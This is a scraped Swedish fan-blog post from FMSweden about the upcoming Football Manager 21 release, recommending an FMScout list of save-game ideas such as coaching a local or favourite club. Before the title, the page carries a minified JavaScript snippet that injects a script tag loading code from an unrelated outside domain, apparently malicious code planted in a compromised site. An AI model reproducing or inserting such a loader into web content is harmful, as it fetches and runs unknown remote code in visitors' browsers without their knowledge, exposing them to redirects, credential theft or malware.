;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: välj och vraka! – FMSweden
Meny Stäng

Veckans inspiration: välj och vraka!

Om cirka två veckor släpps FM21, vilket troligtvis innebär att betan (eller early access som det kallas) släpps under den nästkommande veckan. Detta är inga officiella uppgifter ännu, men om man läser lite mellan raderna på Twitter verkar det vara så. Häng mig inte om det visar sig dröja något längre, med andra ord. Hur som helst, eftersom detta ser ut att bli den sista inspirationen innan release för nästa spel så tänkte jag passa på att tipsa om en lång lista med olika tips från FMScout. Listan går att finna HÄR.

Dessa idéer går förstås att applicera även på FM21, då de är ganska allmänt hållna. Det handlar om att coacha ditt favoritlag, ditt lokala lag, något lag du har besökt IRL, något landslag du tycker om, något lag du spelat med på tidigare upplagor, något lag du tycker sköts dåligt i verkligheten, något lag med fantastiska faciliteter eller stenrik ägare eller varför inte låta slumpen avgöra? Ett förslag är förstås också att starta som arbetslös och arbeta utifrån sina förutsättningar. Hoppas ni hittar något tips i listan som passar just er!

https://www.fmscout.com/a-football-manager-save-ideas.html

Please wait...

Liknande Inlägg

Lämna ett svar